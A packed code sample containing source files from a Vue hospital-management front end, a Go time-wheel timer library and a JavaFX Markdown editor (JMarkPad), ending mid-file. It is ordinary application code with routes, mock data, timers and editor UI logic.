export const editUser = params => { return axios.get(`${base}/user/edit`, { params: params }); };
export const addUser = params => { return axios.get(`${base}/user/add`, { params: params }); };
//
export const registrationGetAll = params => {return axios.post(`${hospital}/registrationinfo/listbycondition`, params);};
export const registrationPerform = params => {return axios.post(`${hospital}/registrationinfo/add`, params);};
export const registrationGetMedicalRecordNo = params => {return axios.post(`${hospital}/registrationinfo/getmedicalrecordno`, params);};
export const registrationWithDraw = params => {return axios.post(`${hospital}/registrationinfo/withdraw`, params);};
export const departmentGetAll = params => {return axios.post(`${hospital}/department/list`, params);};
export const doctorGetByDepartment = params => {return axios.post(`${hospital}/doctor/findbydepartment`, params);};
export const doctorGetAll = params => {return axios.post(`${hospital}/doctor/list`, params);};
<|start_filename|>src/router/doctor.js<|end_filename|>
// Containers
const DefaultContainer = () => import('../containers/DefaultContainer');
//Doctors
const DoctorHome = () => import('../views/doctor/homePage');
const FinalDiagnosis = () => import('../views/doctor/finalDiagnosis');
const PatentPrescription = () => import('../views/doctor/patentPrescription');
const HerbalPrescription = () => import('../views/doctor/herbalPrescription');
const Treatment = () => import('../views/doctor/treatment');
const ExaminationFirst = () => import('../views/doctor/examination1');
const ExaminationSecond = () => import('../views/doctor/examination2');
const TreatmentOver = () => import('../views/doctor/treatmentOver');
const ExpenseSearch = () => import('../views/doctor/expenseSearch');
export default {
path:'/doctor',
redirect:'/doctor/homePage',
name:'Doctor',
component: DefaultContainer,
children: [
{
path: 'homePage',
name: 'homePage',
component: DoctorHome
},
{
path:'finalDiagnosis',
name:'finalDiagnosis',
component:FinalDiagnosis
},
{
path:'patentPrescription',
name:'patentPrescription',
component:PatentPrescription
},
{
path:'herbalPrescription',
name:'herbalPrescription',
component:HerbalPrescription
},
{
path:'treatment',
name:'treatment',
component:Treatment
},
{
path:'examination1',
name:'examination1',
component:ExaminationFirst
},
{
path:'examination2',
name:'examination2',
component:ExaminationSecond
},
{
path:'treatmentOver',
name:'treatmentOver',
component:TreatmentOver
},
{
path:'expenseSearch',
name:'expenseSearch',
component:ExpenseSearch
}
]
}
<|start_filename|>src/nav/pharmacy.js<|end_filename|>
export default [
{
name: '药房工作站',
url: '/pharmacy',
},
]
<|start_filename|>src/nav/doctor.js<|end_filename|>
export default [
{
name: '病历首页',
url: '/doctor/homepage',
},
{
name:'检查申请',
url:'/doctor/examination1',
},
{
name:'检验申请',
url:'/doctor/examination2',
},
{
name:'门诊确诊',
url:'/doctor/finalDiagnosis',
},
{
name:'成药处方',
url:'/doctor/patentPrescription',
},
{
name:'草药处方',
url:'/doctor/herbalPrescription',
},
{
name:'处置申请',
url:'/doctor/treatment',
},
{
name:'费用查询',
url:'/doctor/expenseSearch',
},
{
name:'诊毕',
url:'/doctor/treatmentOver',
},
]
<|start_filename|>src/mock/common.js<|end_filename|>
import Mock from 'mockjs'
import userType from '../config/userType'
export default function () {
const Random = Mock.Random;
Mock.mock('/api/data', () => {//当post或get请求到/api/data路由时Mock会拦截请求并返回上面的数据
let list = [];
for(let i = 0; i < 30; i++) {
let listObject = {
title: Random.csentence(5, 10),//随机生成一段中文文本。
company: Random.csentence(5, 10),
attention_degree: Random.integer(100, 9999),//返回一个随机的整数。
photo: Random.image('114x83', '#00405d', '#FFF', 'Mock.js')
};
list.push(listObject);
}
return {
data: list
};
});
Mock.mock('/api/login',(data)=>{
let param = JSON.parse(data.body);
return{
'code': true,
'user_type':userType.indexOf(param.username)
}
});
}
<|start_filename|>src/router/pharmacy.js<|end_filename|>
// Containers
const DefaultContainer = () => import('../containers/DefaultContainer');
//Pharmacy
// const PharmacyHome = () => import('../views/pharmacy/pharmacy');
const pharmacy = () => import("../views/pharmacy/pharmacy");
export default {
path:'/pharmacy',
redirect:'/pharmacy/pharmacy',
name:'pharmacy',
component: DefaultContainer,
children: [
{
path: '/pharmacy/pharmacy',
name: 'pharmacyHome',
component: pharmacy
}
]
}
<|start_filename|>src/mock/doctor.js<|end_filename|>
import Mock from "mockjs";
export default function () {
const Random = Mock.Random;
Mock.mock(RegExp('/api/getPatientList' + ".*"), "get", ()=>{
let list = [];
for(let i = 0; i < 100; i++) {
let listObject = {
medical_record_id: Random.integer(2019062000, 2019062100),
patient_name: Random.cword(2, 3),
pay_way: Random.cword(2, 4),
diagnosis_status: Random.pick(['待診','已却診','已初诊','诊毕']),
patient_sex:Random.pick(['男','女']),
};
list.push(listObject);
}
return {
code: true,
data: list
}});
Mock.mock(RegExp('/api/getMedicalRecordTemplateList' + ".*"), "get", ()=>{
let list = [];
for(let i = 0; i < 100; i++) {
let listObject = {
medical_record_template_id: Random.integer(1, 100),
medical_record_template_name: Random.cword(4, 5),
};
list.push(listObject);
}
return {
code: true,
data: list
}});
Mock.mock(RegExp('/api/getDiagnosisList' + ".*"), "get", ()=>{
let list = [];
for(let i = 0; i < 3; i++) {
let listObject = {
disease_id:Random.integer(1, 100),
disease_name:Random.cword(4, 5),
main_diagnosis_mark:Random.pick(['1','2']),
suspect_mark:Random.pick(['1','2']),
onset_date:Random.pick(['2019-10-10','2019-10-11']),
};
list.push(listObject);
}
return {
code: true,
data: list
}});
Mock.mock(RegExp('/api/countChineseDiseaseList' + ".*"), "get", {
code:true,
total:100
});
Mock.mock(RegExp('/api/getChineseDiseaseList' + ".*"), "get", ()=>{
let list = [];
for(let i = 0; i < 100; i++) {
let listObject = {
diseaseId:Random.integer(10120, 100012),
diseaseIcd:Random.pick('CDS152', 'CDS154'),
diseaseName:Random.cword(4, 5) ,
diseaseCode:Random.cword(4, 5) ,
diseaseTypeId:Random.integer(1, 100),
};
list.push(listObject);
}
return {
code: true,
data: list
}});
Mock.mock(RegExp('/api/countWesternDiseaseList' + ".*"), "get", {
code:true,
total:100
});
Mock.mock(RegExp('/api/getWesternDiseaseList' + ".*"), "get", ()=>{
let list = [];
for(let i = 0; i < 100; i++) {
let listObject = {
diseaseId:Random.integer(10120, 100012),
diseaseIcd:Random.pick('WES152', 'WES154'),
diseaseName:Random.cword(4, 5) ,
diseaseCode:Random.cword(4, 5) ,
diseaseTypeId:Random.integer(1, 100),
};
list.push(listObject);
}
return {
code: true,
data: list
}});
}
<|start_filename|>src/nav/patient.js<|end_filename|>
export default [
{
name: '自助查询',
url: '/patient/homePage'
},
{
name: '自助挂号',
url: '/patient/register'
},
]
<|start_filename|>src/router/basicInfo.js<|end_filename|>
//默认容器组件
import DefaultContainer from "../containers/DefaultContainer";
//科室信息组件
import DepartmentInfo from "../views/basicInfo/departmentInfo"
//用户信息组件
import UserInfo from "../views/basicInfo/userInfo"
//挂号级别信息组件
import RegistrationLevelInfo from "../views/basicInfo/registrationLevelInfo"
//结算类别信息组件
import CalculationTypeInfo from "../views/basicInfo/calculationTypeInfo"
//诊断目录信息组件
import DiseaseInfo from "../views/basicInfo/diseaseInfo"
//非药品收费项目信息组件
import FmedicalItemsInfo from "../views/basicInfo/fmedicalItemsInfo"
//排班信息组件
import SchedulingInfo from "../views/basicInfo/schedulingInfo"
//排班信息组件
import ExpenseTypeInfo from "../views/basicInfo/expenseTypeInfo"
//排班信息组件
import DrugsInfo from "../views/basicInfo/drugsInfo"
export default {
path: '/basicInfo',
name: 'basicInfo',
redirect:'/basicInfo/departmentInfo',
component: DefaultContainer,
children: [
{
path: 'departmentInfo',
name: 'departmentInfo',
component: DepartmentInfo
},
{
path: 'userInfo',
name: 'userInfo',
component: UserInfo
},
{
path: 'registrationLevelInfo',
name: 'registrationLevelInfo',
component: RegistrationLevelInfo
},
{
path: 'calculationTypeInfo',
name: 'calculationTypeInfo',
component: CalculationTypeInfo
},
{
path: 'diseaseInfo',
name: 'diseaseInfo',
component: DiseaseInfo
},
{
path: 'fmedicalItemsInfo',
name: 'fmedicalItemsInfo',
component: FmedicalItemsInfo
},
{
path: 'schedulingInfo',
name: 'schedulingInfo',
component: SchedulingInfo
},
{
path: 'expenseTypeInfo',
name: 'expenseTypeInfo',
component: ExpenseTypeInfo
},
{
path: 'drugsInfo',
name: 'drugsInfo',
component: DrugsInfo
},
]
}
<|start_filename|>src/nav/basicInfo.js<|end_filename|>
export default [
{
name: '科室管理',
url: '/basicInfo/departmentInfo'
},
{
name: '用户管理',
url: '/basicInfo/userInfo'
},
{
name: '挂号级别管理',
url: '/basicInfo/registrationLevelInfo'
},
{
name: '结算类别管理',
url: '/basicInfo/calculationTypeInfo'
},
{
name: '诊断目录管理',
url: '/basicInfo/diseaseInfo'
},{
name: '非药品收费项目管理',
url: '/basicInfo/fmedicalItemsInfo'
}
,{
name: '医生排班管理',
url: '/basicInfo/schedulingInfo'
},
{
name: '费用科目管理',
url: '/basicInfo/expenseTypeInfo'
},
{
name: '药品管理',
url: '/basicInfo/drugsInfo'
},
]
<|start_filename|>src/nav/register.js<|end_filename|>
export default [
{
name: '挂号首页',
url: '/register/registerHome'
},
{
name: '收费首页',
url: '/register/chargeHome'
},
{
name: '患者费用查询',
url: '/register/chargeHome'
},
]
<|start_filename|>src/router/patient.js<|end_filename|>
// Containers
const DefaultContainer = () => import('../containers/DefaultContainer');
const HomePage = () => import('../views/patient/homePage');
const Register = () => import('../views/patient/register');
export default {
path:'/patient',
// redirect:'/',
name:'Patient',
component: DefaultContainer,
children: [
{
path: 'homePage',
name: 'homePage',
component: HomePage
},
{
path: 'register',
name: 'register',
component: Register
},
]
}
<|start_filename|>src/store/register.js<|end_filename|>
export default {
namespaced:true,
state:{
cashier: {
userId: 1,
}
},
mutations: {
updateCashier(state, newUserId){
state.userId = newUserId;
},
},
}
<|start_filename|>src/config/axios.js<|end_filename|>
import {
baseUrl, //引入baseUrl
} from "../config/env";
import axios from 'axios';
axios.defaults.timeout = 10000; //设置请求时间
axios.defaults.baseURL = baseUrl;//设置默认接口地址
axios.defaults.headers.post['Content-Type'] = 'application/json';//设置post传递JSON
// axios.defaults.withCredentials = true;
// axios.defaults.headers.post['Content-Type']='application/x-www-form-urlencoded';
/**
* 封装get方法
* @param url
* @param data
* @returns {Promise}
*/
export function fetch(url,params={}){
return new Promise((resolve,reject) => {
axios.get(url,{
params:params
})
.then(response => {
resolve(response.data);
})
.catch(err => {
reject(err)
})
})
}
/**
* 封装post请求
* @param url
* @param data
* @returns {Promise}
*/
export function post(url,data = {}){
return new Promise((resolve,reject) => {
axios.post(url,data)
.then(response => {
resolve(response.data);
},err => {
reject(err)
})
})
}
<|start_filename|>src/config/config.local.js<|end_filename|>
module.exports = {
developUrl:"http://localhost:8080/hoso/"
};
<|start_filename|>src/config/userType.js<|end_filename|>
export default ["home", "doctor", "statistics", "basicInfo", "register", "pharmacy", "tech"]
<|start_filename|>src/store/pharmacy.js<|end_filename|>
export default {
namespaced:true,
state:{
curr_user:{}
},
}
<|start_filename|>vue.config.js<|end_filename|>
module.exports = {
lintOnSave: false,
runtimeCompiler: true,
devServer:{
port: 8000,
// proxy:{
// '/sm':{
// target:'https://sm.ms/api',
// changeOrigin: true,
// pathRewrite: {
// '^/sm':''
// }
// }
// }
},
};
<|start_filename|>src/router/register.js<|end_filename|>
//默认容器组件
import DefaultContainer from "../containers/DefaultContainer";
//挂号首页组件
import RegisterHome from "../views/register/registerHome";
//挂号首页组件
import ChargeHome from "../views/register/chargeHome";
export default {
path: '/register',
name: 'register',
redirect:'/register/registerHome',
component: DefaultContainer,
children: [
{
path: 'registerHome',
name: 'registerHome',
component: RegisterHome
},
{
path: 'chargeHome',
name: 'chargeHome',
component: ChargeHome
},
]
}
<|start_filename|>src/mock/index.js<|end_filename|>
import common from './common'
import doctor from "./doctor";
import register from './register'
import basicInfo from "./basicInfo";
import tech from "./tech"
import pharmacy from "./pharmacy";
export default function () {
common();
doctor();
register();
basicInfo();
tech();
pharmacy();
}
<|start_filename|>src/config/env.js<|end_filename|>
// import localConfig from "./config.local"
let baseUrl = '';
if (process.env.NODE_ENV === 'development') {
const localConfig = require("./config.local");
baseUrl = localConfig.developUrl
} else if (process.env.NODE_ENV === 'production') {
baseUrl = 'http://172.16.31.10:8080/hoso';
}
export {
baseUrl,//导出baseUrl
}
| hosoneu/his_Vue |
<|start_filename|>tw.go<|end_filename|>
package goTimeWheel
import (
"container/list"
"time"
)
// TimeWheel Struct
type TimeWheel struct {
interval time.Duration // ticker run interval
ticker *time.Ticker
slots []*list.List
keyPosMap map[interface{}]int // keep each timer's postion
slotNum int
currPos int // timewheel current postion
addChannel chan Task // channel to add Task
removeChannel chan interface{} // channel to remove Task
stopChannel chan bool // stop signal
}
// Task Struct
type Task struct {
key interface{} // Timer Task ID
delay time.Duration // Run after delay
circle int // when circle equal 0 will trigger
fn func(interface{}) // custom function
params interface{} // custom parms
}
// New Func: Generate TimeWheel with ticker and slotNum
func New(interval time.Duration, slotNum int) *TimeWheel {
if interval <= 0 || slotNum <= 0 {
return nil
}
tw := &TimeWheel{
interval: interval,
slots: make([]*list.List, slotNum),
keyPosMap: make(map[interface{}]int),
currPos: 0,
slotNum: slotNum,
addChannel: make(chan Task),
removeChannel: make(chan interface{}),
stopChannel: make(chan bool),
}
for i := 0; i < slotNum; i++ {
tw.slots[i] = list.New()
}
return tw
}
// Start Func: start ticker and monitor channel
func (tw *TimeWheel) Start() {
tw.ticker = time.NewTicker(tw.interval)
go tw.start()
}
func (tw *TimeWheel) start() {
for {
select {
case <-tw.ticker.C:
tw.handle()
case task := <-tw.addChannel:
tw.addTask(&task)
case key := <-tw.removeChannel:
tw.removeTask(key)
case <-tw.stopChannel:
tw.ticker.Stop()
return
}
}
}
func (tw *TimeWheel) Stop() {
tw.stopChannel <- true
}
func (tw *TimeWheel) AddTimer(delay time.Duration, key interface{}, fn func(interface{}), params interface{}) {
if delay < 0 {
return
}
tw.addChannel <- Task{delay: delay, key: key, fn: fn, params: params}
}
func (tw *TimeWheel) RemoveTimer(key interface{}) {
if key == nil {
return
}
tw.removeChannel <- key
}
// handle Func: Do currPosition slots Task
func (tw *TimeWheel) handle() {
l := tw.slots[tw.currPos]
for e := l.Front(); e != nil; {
curElement := e
task := e.Value.(*Task)
next := e.Next()
e = next
if task.circle > 0 {
task.circle--
continue
}
go task.fn(task.params)
l.Remove(curElement)
if task.key != nil {
delete(tw.keyPosMap, task.key)
}
}
tw.currPos = (tw.currPos + 1) % tw.slotNum
}
// getPosAndCircle Func: parse duration by interval to get circle and position
func (tw *TimeWheel) getPosAndCircle(d time.Duration) (pos int, circle int) {
circle = int(d.Seconds()) / int(tw.interval.Seconds()) / tw.slotNum
pos = (tw.currPos + int(d.Seconds())/int(tw.interval.Seconds())) % tw.slotNum
return
}
func (tw *TimeWheel) addTask(task *Task) {
pos, circle := tw.getPosAndCircle(task.delay)
task.circle = circle
tw.slots[pos].PushBack(task)
if task.key != nil {
tw.keyPosMap[task.key] = pos
}
}
func (tw *TimeWheel) removeTask(key interface{}) {
pos, ok := tw.keyPosMap[key]
if !ok {
return
}
l := tw.slots[pos]
for e := l.Front(); e != nil; {
task := e.Value.(*Task)
if task.key == key {
delete(tw.keyPosMap, task.key)
l.Remove(e)
}
e = e.Next()
}
}
| zheng-ji/goTimeWheel |
<|start_filename|>src/main/resources/css/JMarkPad.css<|end_filename|>
.jfx-decorator .jfx-decorator-buttons-container {
-fx-background-color: -fx-decorator-color;
}
.jfx-decorator .resize-border {
-fx-border-color: -fx-decorator-color;
-fx-border-width: 0 4 4 4;
}
.jfx-tab-pane .tab-header-background {
-fx-background-color: tab-header-background;
}
.tab-button {
-fx-text-fill: WHITE;
}
.tab-button:hover {
-fx-background-color: -fx-decorator-color;
}
.custom-jfx-button-raised {
-fx-padding: 0.7em 0.57em;
-fx-font-size: 14.0px;
-jfx-button-type: RAISED;
-fx-pref-width: 100.0;
-fx-background-color: -fx-decorator-color;
-fx-text-fill: WHITE;
}
<|start_filename|>src/main/java/utilities/Utilities.java<|end_filename|>
package utilities;
import com.vladsch.flexmark.util.ast.Node;
import com.vladsch.flexmark.html.HtmlRenderer;
import com.vladsch.flexmark.parser.Parser;
import com.vladsch.flexmark.util.data.MutableDataSet;
import javafx.scene.paint.Color;
public class Utilities {
private static Parser parser;
private static HtmlRenderer renderer;
static {
MutableDataSet options = new MutableDataSet();
parser = Parser.builder(options).build();
renderer = HtmlRenderer.builder(options).build();
}
public static String reparse(String text) {
Node document = parser.parse(text.replace("\n", "\n\n"));
return renderer.render(document);
}
}
<|start_filename|>src/main/java/ui/Main.java<|end_filename|>
package ui;
public class Main{
public static void main(String[] args) {
javafx.application.Application.launch(UI.class);
}
}
<|start_filename|>src/main/java/ui/panes/OptionsPane.java<|end_filename|>
package ui.panes;
import com.jfoenix.controls.JFXButton;
import javafx.fxml.FXML;
import javafx.fxml.FXMLLoader;
import javafx.scene.Parent;
import javafx.scene.layout.Region;
import javafx.scene.layout.StackPane;
import javafx.scene.paint.Color;
import javafx.scene.control.ColorPicker;
import ui.UI;
import java.io.IOException;
public class OptionsPane extends StackPane {
@FXML
private ColorPicker colorPicker;
@FXML
private JFXButton backButton;
public OptionsPane(UI ui) {
try {
FXMLLoader fxmlLoader = new FXMLLoader(getClass().getResource("/fxml/panes/OptionsPane.fxml"));
fxmlLoader.setController(this);
Parent root = (Region) fxmlLoader.load();
getStylesheets().add("/css/JMarkPad.css");
addListeners(ui);
colorPicker.setValue(Color.web(ui.primaryColor));
getChildren().add(root);
} catch (IOException e) {
e.printStackTrace();
}
}
private void addListeners(UI ui) {
colorPicker.setOnAction(t -> {
Color color = colorPicker.getValue();
ui.primaryColor = String.valueOf(color).replace("0x", "#");
ui.secondaryColor = String.valueOf(color.brighter().brighter()).replace("0x", "#");
ui.refreshTheme();
});
backButton.setOnAction(e -> {
ui.drawersStack.setMouseTransparent(true);
ui.drawersStack.toggle(ui.optionsDrawer);
});
}
}
<|start_filename|>src/main/java/ui/JMPTab.java<|end_filename|>
package ui;
import com.jfoenix.controls.*;
import com.jfoenix.svg.SVGGlyph;
import javafx.scene.Cursor;
import javafx.scene.control.SplitPane;
import javafx.scene.control.Tab;
import javafx.scene.layout.StackPane;
import javafx.scene.paint.Color;
import javafx.scene.text.Text;
import javafx.scene.web.WebView;
import javafx.stage.FileChooser;
import javafx.stage.Stage;
import utilities.Utilities;
import utilities.HyperLinkRedirectListener;
import java.io.*;
import java.util.Properties;
public class JMPTab extends Tab {
private JFXButton btnClose;
private SplitPane splitPane;
private JFXTextArea textArea;
private WebView webView;
private String filePath = "";
boolean isSaved = true;
JMPTab(String name, JFXTabPane tabPane) {
super(name);
splitPane = new SplitPane();
setTextArea(new JFXTextArea());
setWebView(new WebView());
setOnCloseRequest(e -> checkIfUserWantsToSaveFile());
createTabButton();
setContent(splitPane);
setGraphic(btnClose);
((JFXButton) getGraphic()).setOnAction(e -> {
if (!isSaved) {
checkIfUserWantsToSaveFile();
}
tabPane.getTabs().remove(this);
});
webView.getEngine().getLoadWorker().stateProperty().addListener(new HyperLinkRedirectListener(webView));
}
private void createTabButton() {
SVGGlyph close = new SVGGlyph(0,
"CLOSE",
"M810 274l-238 238 238 238-60 60-238-238-238 238-60-60 238-238-238-238 60-60 238 238 238-238z",
Color.WHITE);
close.setSize(12, 12);
this.btnClose = new JFXButton();
this.btnClose.getStyleClass().add("tab-button");
this.btnClose.setCursor(Cursor.HAND);
this.btnClose.setGraphic(close);
}
void checkIfUserWantsToSaveFile() {
if (!isSaved) {
JFXDialogLayout dialogLayout = new JFXDialogLayout();
String title = "Saving...";
dialogLayout.setHeading(new Text(title));
String body = "Save file \"" + getText().replace(" (*)", "") + "\" ?";
dialogLayout.setBody(new Text(body));
JFXButton btnYes = new JFXButton("YES");
JFXButton btnNo = new JFXButton("NO");
btnYes.setCursor(Cursor.HAND);
btnNo.setCursor(Cursor.HAND);
btnYes.getStyleClass().add("custom-jfx-button-raised");
btnYes.setStyle("-fx-background-color: #4caf50");
btnNo.getStyleClass().add("custom-jfx-button-raised");
btnNo.setStyle("-fx-background-color: #f44336");
dialogLayout.setActions(btnYes, btnNo);
JFXDialog dialog = new JFXDialog((StackPane) getTabPane().getParent(), dialogLayout, JFXDialog.DialogTransition.TOP, false);
btnYes.setOnAction(e -> {
checkSaveInCurrentPath();
dialog.close();
});
btnNo.setOnAction(e -> dialog.close());
dialog.show();
}
}
void checkSaveInCurrentPath() {
File file = null;
if (filePath.isEmpty()) {
try {
FileChooser fc = new FileChooser();
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("All files (*.*)", "*.*"));
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("TXT files (*.txt)", "*.txt"));
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("Markdown files (*.md)", "*.md"));
Properties properties = new Properties();
properties.load(new FileInputStream("jmarkpad.properties"));
String folderPath = properties.getProperty("folderPath");
if (folderPath != null) {
fc.setInitialDirectory(new File(folderPath));
}
file = fc.showSaveDialog(new Stage());
} catch (Exception e) {
e.printStackTrace();
}
} else {
file = new File(filePath);
}
save(file);
}
void saveAs() {
try {
FileChooser fc = new FileChooser();
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("All files (*.*)", "*.*"));
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("TXT files (*.txt)", "*.txt"));
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("Markdown files (*.md)", "*.md"));
Properties properties = new Properties();
properties.load(new FileInputStream("jmarkpad.properties"));
String folderPath = properties.getProperty("folderPath");
if (folderPath != null && !folderPath.isEmpty()) {
fc.setInitialDirectory(new File(folderPath));
}
File file = fc.showSaveDialog(new Stage());
save(file);
folderPath = file.getParent();
properties.setProperty("folderPath", String.valueOf(file.getParent()));
properties.store(new FileOutputStream("jmarkpad.properties"), null);
} catch (Exception e) {
e.printStackTrace();
}
}
private void save(File file) {
if (file != null) {
try {
FileWriter fileWriter = new FileWriter(file);
fileWriter.write(getTextArea().getText());
fileWriter.close();
filePath = file.getAbsolutePath();
setSaved(true);
setText(file.getName());
} catch (IOException ex) {
ex.printStackTrace();
}
}
}
//Getters and setters
@SuppressWarnings("unused")
void setTextArea(JFXTextArea textArea) {
this.textArea = textArea;
textArea.textProperty().addListener(o -> {
webView.getEngine().loadContent(Utilities.reparse(textArea.getText()), "text/html");
setSaved(false);
});
if(this.webView != null)
{
this.webView.getEngine().loadContent(Utilities.reparse(textArea.getText()), "text/html");
}
if (splitPane.getItems().size() > 1) {
splitPane.getItems().remove(0);
}
splitPane.getItems().add(0, textArea);
setContent(splitPane);
}
@SuppressWarnings("unused")
private void setWebView(WebView webView) {
this.webView = webView;
if (splitPane.getItems().size() > 1) {
splitPane.getItems().remove(1);
}
splitPane.getItems().add(1, webView);
setContent(splitPane);
}
@SuppressWarnings("unused")
private JFXTextArea getTextArea() {
return textArea;
}
@SuppressWarnings("unused")
public WebView getWebView() {
return webView;
}
@SuppressWarnings("unused")
public void setSaved(boolean isSaved) {
this.isSaved = isSaved;
if (isSaved) {
setText(getText().replace(" (*)", ""));
} else {
setText(getText().replace(" (*)", "") + " (*)");
}
}
@SuppressWarnings("unused")
String getFilePath() {
return filePath;
}
@SuppressWarnings("unused")
void setFilePath(String filePath) {
this.filePath = filePath;
}
}
<|start_filename|>src/main/java/ui/UI.java<|end_filename|>
package ui;
import com.jfoenix.controls.*;
import com.jfoenix.controls.JFXDrawer.DrawerDirection;
import javafx.application.Application;
import javafx.beans.value.ChangeListener;
import javafx.beans.value.ObservableValue;
import javafx.event.ActionEvent;
import javafx.fxml.FXML;
import javafx.fxml.FXMLLoader;
import javafx.fxml.Initializable;
import javafx.scene.Cursor;
import javafx.scene.Parent;
import javafx.scene.Scene;
import javafx.scene.control.MenuBar;
import javafx.scene.control.Tab;
import javafx.scene.layout.FlowPane;
import javafx.scene.layout.Region;
import javafx.scene.layout.StackPane;
import javafx.scene.text.Text;
import javafx.stage.FileChooser;
import javafx.stage.Stage;
import javafx.stage.StageStyle;
import ui.panes.OptionsPane;
import java.io.*;
import java.net.URL;
import java.util.Properties;
import java.util.ResourceBundle;
public class UI extends Application implements Initializable {
private Stage stage;
@FXML
public StackPane stackPane;
@FXML
public JFXDrawersStack drawersStack;
@FXML
public JFXTabPane tabPane;
@FXML
public MenuBar menuBar;
private static String receivedPath = "";
public JFXDrawer optionsDrawer, aboutDrawer;
public String primaryColor;
public String secondaryColor;
private JMPDecorator decorator;
private String folderPath;
@Override
public void start(Stage stage) {
this.stage = stage;
try {
FXMLLoader fxmlLoader = new FXMLLoader(getClass().getResource("/fxml/JMarkPad.fxml"));
fxmlLoader.setController(this);
Parent root = (Region) fxmlLoader.load();
decorator = new JMPDecorator(stage, root);
decorator.setTitle("JMarkPad");
decorator.setBtnFullscreenVisible(false);
decorator.setCustomMaximize(true);
Scene scene = new Scene(decorator, 800, 600);
scene.getStylesheets().add("/css/JMarkPad.css");
stage.initStyle(StageStyle.UNDECORATED);
stage.setResizable(true);
stage.setMinWidth(800);
stage.setMinHeight(600);
stage.setScene(scene);
loadConfig();
loadDrawers();
if (!receivedPath.equals("")) {
JMPTab tab = new JMPTab(receivedPath.split("\\\\")[receivedPath.split("\\\\").length - 1],
tabPane);
try {
openFileIntoTab(new File(receivedPath), tab);
tab.setFilePath(receivedPath);
} catch (FileNotFoundException ignored) {
}
tabPane.getTabs().add(tab);
} else {
if (tabPane.getTabs().size() < 1) {
JMPTab tab = new JMPTab("New 1", tabPane);
tabPane.getTabs().add(tab);
}
}
refreshTheme();
stage.show();
} catch (Throwable t) {
t.printStackTrace();
}
}
private void loadConfig() {
try {
if (!new File("jmarkpad.properties").exists()) {
createPropertiesFile("", true);
}
Properties properties = new Properties();
properties.load(new FileInputStream("jmarkpad.properties"));
stage.setX(Double.valueOf(properties.getProperty("posX")));
stage.setY(Double.valueOf(properties.getProperty("posY")));
stage.setWidth(Double.valueOf(properties.getProperty("width")));
stage.setHeight(Double.valueOf(properties.getProperty("height")));
primaryColor = String.valueOf(properties.getProperty("primaryColor"));
secondaryColor = String.valueOf(properties.getProperty("secondaryColor"));
folderPath = properties.getProperty("folderPath");
String pathFiles = properties.getProperty("filePaths");
for (String path : pathFiles.split(";")) {
if (path.length() > 1) {
JMPTab tab = new JMPTab(new File(path).getName(), tabPane);
File file = new File(path);
openFileIntoTab(file, tab);
tab.setFilePath(file.getAbsolutePath());
tabPane.getTabs().add(tab);
tabPane.getSelectionModel().select(tab);
}
}
} catch (Exception e) {
e.printStackTrace();
}
}
private void loadDrawers() {
drawersStack.setMouseTransparent(true);
FlowPane content = new FlowPane();
StackPane optionsDrawerPane = new StackPane();
optionsDrawer = new JFXDrawer();
OptionsPane optionsPane = new OptionsPane(this);
optionsDrawerPane.getChildren().add(optionsPane);
optionsDrawer.setDirection(DrawerDirection.RIGHT);
optionsDrawer.setSidePane(optionsDrawerPane);
optionsDrawer.setDefaultDrawerSize(150);
optionsDrawer.setOverLayVisible(false);
optionsDrawer.setResizableOnDrag(true);
drawersStack.setContent(content);
}
@Override
public void initialize(URL location, ResourceBundle resources) {
}
@FXML
public void newClicked(ActionEvent ae) {
String newFileName = "";
int counter = 1;
boolean usedName;
while (newFileName.equals("")) {
usedName = false;
for (int i = 0; i < tabPane.getTabs().size(); i++) {
if (tabPane.getTabs().get(i).getText().contains("New " + counter)) {
usedName = true;
i = tabPane.getTabs().size();
}
}
if (!usedName) {
newFileName = "New " + counter;
}
counter++;
}
JMPTab tab = new JMPTab(newFileName, tabPane);
tabPane.getTabs().add(tab);
tabPane.getSelectionModel().select(tab);
}
@FXML
public void openClicked(ActionEvent ae) {
try {
FileChooser fc = new FileChooser();
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("All files (*.*)", "*.*"));
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("TXT files (*.txt)", "*.txt"));
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("Markdown files (*.md)", "*.md"));
Properties properties = new Properties();
properties.load(new FileInputStream("jmarkpad.properties"));
String folderPath = properties.getProperty("folderPath");
if (folderPath != null && !folderPath.isEmpty()) {
fc.setInitialDirectory(new File(folderPath));
}
File file = fc.showOpenDialog(stage);
if (file != null) {
folderPath = file.getParent();
if (!fileIsAlreadyOpened(file.getAbsolutePath())) {
JMPTab tab = new JMPTab(file.getName(), tabPane);
openFileIntoTab(file, tab);
tab.setFilePath(file.getAbsolutePath());
tabPane.getTabs().add(tab);
tabPane.getSelectionModel().select(tab);
properties.setProperty("folderPath", String.valueOf(folderPath));
properties.store(new FileOutputStream("jmarkpad.properties"), null);
}
}
} catch (Exception e) {
e.printStackTrace();
}
}
@FXML
public void saveClicked(ActionEvent ae) {
((JMPTab) tabPane.getTabs().get(tabPane.getSelectionModel().getSelectedIndex())).checkSaveInCurrentPath();
}
@FXML
public void saveAllClicked(ActionEvent ae) {
for (int i = 0; i < tabPane.getTabs().size(); i++) {
((JMPTab) tabPane.getTabs().get(i)).checkSaveInCurrentPath();
}
}
@FXML
public void saveAsClicked(ActionEvent ae) {
for (int i = 0; i < tabPane.getTabs().size(); i++) {
((JMPTab) tabPane.getTabs().get(i)).saveAs();
}
}
@FXML
public void closeClicked(ActionEvent ae) {
if (!((JMPTab) tabPane.getTabs().get(tabPane.getSelectionModel().getSelectedIndex())).isSaved) {
((JMPTab) tabPane.getTabs().get(tabPane.getSelectionModel().getSelectedIndex())).checkIfUserWantsToSaveFile();
}
tabPane.getTabs().remove(tabPane.getSelectionModel().getSelectedIndex());
}
@FXML
public void optionsClicked(ActionEvent ae) {
drawersStack.toggle(optionsDrawer);
drawersStack.setMouseTransparent(false);
}
@FXML
public void markDownHelpClicked(ActionEvent ae) {
JMPTab examplesTab = new JMPTab("Markdown Help", tabPane);
JFXTextArea textArea = new JFXTextArea();
examplesTab.setTextArea(textArea);
tabPane.getTabs().add(examplesTab);
tabPane.getSelectionModel().select(examplesTab);
textArea.setText("# Title 1\n\n" +
"## Title 2\n\n" +
